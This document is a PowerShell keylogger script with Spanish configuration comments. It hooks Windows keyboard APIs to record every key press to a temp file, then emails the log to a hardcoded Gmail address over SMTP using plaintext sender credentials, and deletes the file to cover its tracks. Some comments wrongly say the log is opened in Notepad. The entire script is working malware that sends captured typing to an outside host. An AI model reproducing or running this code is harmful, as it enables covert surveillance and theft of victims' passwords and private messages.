ZulaError404

1. # Editar solo esta sección!
2. $TimeToRun = 2
3. $From = "spyenviador@gmail.com"
4. $Pass = "zulacorp"
5. $To = "Code0fromu@gmail.com"
6. $Subject = "Keylogger Results"
7. $body = "Keylogger Results"
8. $SMTPServer = "smtp.gmail.com"
9. $SMTPPort = "587"
10. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
11. ############################
12.  
13.  
14. $TimeStart = Get-Date
15. $TimeEnd = $timeStart.addminutes($TimeToRun)
16.  
17. #requires -Version 2
18. function Start-KeyLogger($Path="$env:temp\Keybat.txt")
19. {
20. # Signatures for API Calls
21. $signatures = @'
22. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
23. public static extern short GetAsyncKeyState(int virtualKeyCode);
24. [DllImport("user32.dll", CharSet=CharSet.Auto)]
25. public static extern int GetKeyboardState(byte[] keystate);
26. [DllImport("user32.dll", CharSet=CharSet.Auto)]
27. public static extern int MapVirtualKey(uint uCode, int uMapType);
28. [DllImport("user32.dll", CharSet=CharSet.Auto)]
29. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
30. '@
31.  
32. # load signatures and make members available
33. $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
34.  
35. # create output file
36. $null = New-Item -Path $Path -ItemType File -Force
37.  
38. try
39. {
40.  
41. # create endless loop. When user presses CTRL+C, finally-block
42. # executes and shows the collected key presses
43. while ($TimeEnd -ge $TimeNow) {
44. Start-Sleep -Milliseconds 40
45.  
46. # scan all ASCII codes above 8
47. for ($ascii = 9; $ascii -le 254; $ascii++) {
48. # get current key state
49. $state = $API::GetAsyncKeyState($ascii)
50.  
51. # is key pressed?
52. if ($state -eq -32767) {
53. $null = [console]::CapsLock
54.  
55. # translate scan code to real code
56. $virtualKey = $API::MapVirtualKey($ascii, 3)
57.  
58. # get keyboard state for virtual keys
59. $kbstate = New-Object Byte[] 256
60. $checkkbstate = $API::GetKeyboardState($kbstate)
61.  
62. # prepare a StringBuilder to receive input key
63. $mychar = New-Object -TypeName System.Text.StringBuilder
64.  
65. # translate virtual key
66. $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
67.  
68. if ($success)
69. {
70. # add key to logger file
71. [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
72. }
73. }
74. }
75. $TimeNow = Get-Date
76. }
77. }
78. finally
79. {
80. # open logger file in Notepad
81. send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
82. Remove-Item -Path $Path -force
83. exit 1
84. }
85. }
86.  
87. # records all key presses until script is aborted by pressing CTRL+C
88. # will then open the file with collected key codes
89. Start-KeyLogger